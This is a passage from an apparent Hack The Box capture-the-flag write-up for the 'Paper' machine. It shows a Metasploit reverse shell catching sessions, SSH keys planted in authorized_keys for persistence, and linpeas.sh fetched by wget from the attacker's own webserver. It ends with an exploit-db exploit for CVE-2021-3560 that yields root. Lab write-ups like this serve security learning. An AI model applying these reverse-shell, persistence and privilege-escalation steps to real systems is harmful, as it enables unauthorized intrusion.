msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.161:4444 
[*] Command shell session 1 opened (10.10.14.161:4444 -> 10.129.212.181:56240 ) at 2022-05-09 00:57:47 -0400
[*] Command shell session 2 opened (10.10.14.161:4444 -> 10.129.212.181:56238 ) at 2022-05-09 00:57:47 -0400


Shell Banner:
bash: cannot set terminal process group (1608): Inappropriate ioctl for device
-----
          

[dwight@paper hubot]$ id
id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
[dwight@paper hubot]$

Root Flag

So first I generated the private and public ssh keys.

ssh-keygen -t rsa -N '' -f /home/dwight/.ssh/id_rsa

I then copied the value of the public key into authorized_keys to allow me to authenticate to the machine using the private ssh key.

cp /home/dwight/.ssh/id_rsa.pub /home/dwight/.ssh/authorized_keys

Finally, I copied the value of the private ssh key.

cat id_rsa

With all of that done, I could authenticate to the server using ssh.

┌─[✗]─[h3dg3h0g@parrotOS]─[~/Desktop/HackTheBox/Machines/EASY/Paper/ssh]
└──╼ $ssh dwight@paper.htb -i id_rsa 
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$

For the privesc part, I like to use linpeas.sh for the discovery. I transferred it into the box by creating a python webserver on my machine and then downloading the file on the server using wget.

[dwight@paper ~]$ wget http://10.10.14.161:8000/linpeas.sh
--2022-05-09 01:10:39--  http://10.10.14.161:8000/linpeas.sh
Connecting to 10.10.14.161:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776423 (758K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                   100%[==============================================>] 758.23K  1.20MB/s    in 0.6s    

2022-05-09 01:10:40 (1.20 MB/s) - ‘linpeas.sh’ saved [776423/776423]

[dwight@paper ~]$

Right at the beginning of the script, linpeas.sh told me that the machine is probably vulnerable to CVE-2021-3560.

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560

Finally, I found an exploit on exploit-db for this CVE (https://www.exploit-db.com/exploits/50011). I had to run it a couple of times for it to work, but I still ended up getting a root shell.

[root@paper hacked]# id
uid=0(root) gid=0(root) groups=0(root)

Paper Writeup

User Flag

Root Flag

Paper Writeup

User Flag

Root Flag